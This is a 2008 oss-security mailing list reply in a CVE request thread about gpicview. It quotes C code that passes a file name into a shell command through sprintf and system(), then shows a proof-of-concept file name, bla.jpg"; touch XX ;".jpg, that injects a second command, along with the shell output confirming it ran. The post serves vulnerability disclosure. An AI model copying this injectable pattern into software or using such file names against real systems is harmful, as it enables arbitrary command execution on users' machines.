[<prev] [next>] [<thread-prev] [thread-next>] [month] [year] [list]
Date: Wed, 3 Sep 2008 01:59:47 +0200
From: Robert Buchholz <rbu@...too.org>
To: oss-security@...ts.openwall.com
Subject: Re: CVE Request (gpicview)
On Sunday 31 August 2008, Nico Golde wrote:
> Same piece of code main-win.c doesn't look too trustworthy
> to me either:
>
> 690 int error = jpegtran (filename, "/tmp/rot.jpg" , code);
> 691 if(error)
> 692 return error;
> 693
> 694 //now copy /tmp/rot.jpg back to the original file
> 695 char command[strlen(filename)+50]; //this should not
> generate buffer owerflow 696 // MS: didn't know, how to make it
> better, maybe an own copy routine 697 sprintf(command,"cp
> /tmp/rot.jpg \"%s\"",filename); 698 system(command);
>
> Anyone played with crafted file names?
Good catch! You need to append '.jpg' at the end of the crafed filename
so the rotation via jpegtran is invoked, but besides that it works ok:
rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
rbu@...nut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C
rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw------- 1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw------- 1 rbu rbu 0 2008-09-03 01:52 XX
Robert
[ CONTENT OF TYPE application/pgp-signature SKIPPED ]
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux